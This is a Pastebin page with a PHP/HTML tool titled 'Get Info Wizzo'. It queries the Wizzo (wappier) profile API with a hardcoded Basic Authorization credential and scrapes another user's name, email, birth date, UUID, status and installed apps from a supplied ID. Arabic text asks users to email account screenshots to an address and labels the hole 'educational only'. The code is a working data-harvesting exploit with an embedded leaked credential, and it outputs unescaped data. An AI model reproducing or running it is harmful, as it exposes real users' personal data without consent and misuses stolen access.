Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>Get Info Wizzo</title>
- <link rel="shortcut icon" href="https://lh3.googleusercontent.com/Vw2HXPuqzxCdUAisiapQVtAAposUE4hetZCOoiWer6n5GoJnhzBwiFSDH_8rCQQidpE=w300" type="image/x-icon" />
- <style type="text/css">
- html {
- background: url(https://cdn-d4d.kxcdn.com/wp-content/uploads/2015/07/hacker_wallpapers-1.jpg) no-repeat center center fixed;
- -webkit-background-size: cover;
- -moz-background-size: cover;
- -o-background-size: cover;
- background-size: cover;
- }
- </style>
- <style>
- input[type=text] {
- padding:5px;
- border:2px solid #ccc;
- -webkit-border-radius: 5px;
- border-radius: 5px;
- }
- input[type=text]:focus {
- border-color:#333;
- }
- input[type=submit] {
- padding:5px 15px;
- background:#ccc;
- border:0 none;
- cursor:pointer;
- -webkit-border-radius: 5px;
- border-radius: 5px;
- }
- </style>
- <center>
- <img src="https://lh3.googleusercontent.com/Vw2HXPuqzxCdUAisiapQVtAAposUE4hetZCOoiWer6n5GoJnhzBwiFSDH_8rCQQidpE=w190">
- <br><br><br>
- <form action="" method="post">
- <center>
- <font color="white">ارسل صورة حساب المتسابق على الأيميل : wiz@1337r00t.com</font><br></br>
- <font color="blue">ثم ضع الآي دي المرسل لك هنا</font><br>
- <font color="red"> ID :<input type="text" name="id"></font><br><br>
- <input type="submit" value="Get Info :)">
- </center>
- </form>
- <?
- $id = $_POST['id'];
- $wizzo = curl_init();
- curl_setopt($wizzo, CURLOPT_URL, "https://wizzo.wappier.com/api/profile/$id/?fields=user");
- curl_setopt($wizzo, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($wizzo, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($wizzo, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($wizzo, CURLOPT_HEADER, 1);
- curl_setopt($wizzo, CURLOPT_HTTPHEADER, array(
- 'Authorization: Basic NTkyNTYzNDMwZmE4YzUxZjVmYWRkODk2OnpTQTA3NWt3',
- 'Host: wizzo.wappier.com',
- 'Connection: Keep-Alive'
- ));
- curl_setopt($wizzo, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
- $source = curl_exec($wizzo);
- if(eregi('{"user":{"_id":"'.$id.'"', $source))
- {
- ///////////////////
- $startbirth = explode('"datebirth":"' , $source );
- $endbirth = explode('T' , $startbirth[1] );
- $birth = $endbirth[0];
- ######################
- $startname = explode('"name":"' , $source );
- $endname = explode('"' , $startname[1] );
- $name = $endname[0];
- ######################
- $startemail = explode('"username":"' , $source );
- $endemail = explode('"' , $startemail[1] );
- $email = $endemail[0];
- ######################
- $startuuid = explode('"uuid":"' , $source );
- $enduuid = explode('"' , $startuuid[1] );
- $uuid = $enduuid[0];
- ######################
- $startstatus = explode('"status":"' , $source );
- $endstatus = explode('"' , $startstatus[1] );
- $status = $endstatus[0];
- ######################
- $startinstalled = explode('"installedApps":["' , $source );
- $endinstalled = explode(']' , $startinstalled[1] );
- $installed = $endinstalled[0];
- ///////////////////
- echo '
- <br>
- <center>
- <font color="green">
- Id : '.$id.'<br>
- Name : '.$name.'<br>
- Email : '.$email.'<br>
- UUID : '.$uuid.'<br>
- Status : '.$status.'<br>
- installedApps -> <input type="text" value="'.$installed.'"><br>
- هذه الثغرة تعليمية فقط
- </font>
- </center>
- <br>
- ';
- }
- else
- {
- if(eregi('Unauthorized', $source))
- {
- echo "<br><center><font color='red'>Unauthorized</font></center><br>";
- }
- else
- {
- echo '<script>alert("")</script>';
- echo "<br><center><font color='blue'>Failed or input any id</font></center><br>";
- }
- }
- curl_close($wizzo);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
